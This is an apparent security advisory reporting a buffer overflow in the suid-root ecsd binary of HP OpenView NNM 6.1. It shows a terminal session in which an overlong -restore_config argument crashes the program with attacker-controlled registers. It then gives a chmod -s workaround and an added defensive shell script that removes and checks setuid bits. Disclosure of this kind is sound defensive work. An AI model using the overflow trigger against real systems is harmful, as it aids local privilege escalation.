COMMAND

    OpenView NNM

SYSTEMS AFFECTED

    HP OpenView NNM v6.1

PROBLEM

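    Jonas Eriksson found the following.  HP OpenView NNM v6.1 has a
    buffer overflow in the suid-root file ecsd, located in the
    /opt/OV/bin/ directory.

    ecsd is not used in NNM, but is shipped and installed suid-root by
    default.  In the session below, a 312-byte argument to
    -restore_config is rejected with a normal error message, while a
    313-byte argument crashes the program; the core file shows
    registers l1-l7 and i0-i5 holding 0x41414141 ("AAAA"), i.e. the
    contents of the argument.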

        je@openview~> uname -a
        SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
        je@openview~> ls -la /opt/OV/bin/ecsd
        -r-sr-xr-x   1 root     bin    2953640 maj 18 11:20 /opt/OV/bin/ecsd
        je@openview~> pwd
        /
        je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
        Failed to restore engine
        configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
        je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
        Segmentation fault (core dumped)
        je@openview~> gdb /opt/OV/bin/ecsd --core=core
        [snip..]
        Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
        [snip..]
        #0  0x28eb8 in main ()
        (gdb) inf reg
        [snip..]
        l1             0x41414141       1094795585
        l2             0x41414141       1094795585
        l3             0x41414141       1094795585
        l4             0x41414141       1094795585
        l5             0x41414141       1094795585
        l6             0x41414141       1094795585
        l7             0x41414141       1094795585
        i0             0x41414141       1094795585
        i1             0x41414141       1094795585
        i2             0x41414141       1094795585
        i3             0x41414141       1094795585
        i4             0x41414141       1094795585
        i5             0x41414141       1094795585
        fp             0x41410028       1094778920
        [snip..]
        (gdb)

SOLUTION

    Hewlett-Packard has been contacted.  They are currently working on
    patches for this vulnerability.  Workaround:

        chmod -s /opt/OV/bin/ecsd

    This removes the setuid bit from /opt/OV/bin/ecsd, so if someone
    does exploit this vulnerability, they won't gain higher
    privileges.
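
    The following is an added example, not part of the original
    advisory or of HP's software: shell helpers that apply the chmod -s
    workaround, confirm it took effect, and list any files in a
    directory that still carry the setuid bit.  The function names are
    hypothetical.

```shell
#!/bin/sh
# Added example: apply and verify the advisory's "chmod -s" workaround.
# Function names are illustrative, not part of any HP tooling.

# List regular files under DIR that carry the setuid bit (mode 4000).
list_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# Count of setuid files remaining under DIR.
count_setuid() {
    list_setuid "$1" | wc -l | tr -d ' '
}

# Succeed only if FILE is a regular file with the setuid bit set.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Apply the workaround to FILE and confirm the result.
# Returns 0 if FILE ends up without setuid, 1 on failure, 2 if missing.
drop_setuid() {
    file=$1
    [ -f "$file" ] || { echo "missing: $file" >&2; return 2; }
    if is_setuid "$file"; then
        # Note: chmod -s clears the setgid bit as well as setuid.
        chmod -s "$file" || return 1
    fi
    if is_setuid "$file"; then
        echo "still setuid: $file" >&2
        return 1
    fi
    echo "ok: $file is not setuid"
}

# When run with file arguments, apply the workaround to each of them,
# e.g.:  sh drop_setuid.sh /opt/OV/bin/ecsd
if [ "$#" -gt 0 ]; then
    for f in "$@"; do
        drop_setuid "$f"
    done
fi
```

    Run it as root against /opt/OV/bin/ecsd; list_setuid /opt/OV/bin
    then shows which other files in that directory are still setuid
    and should be reviewed.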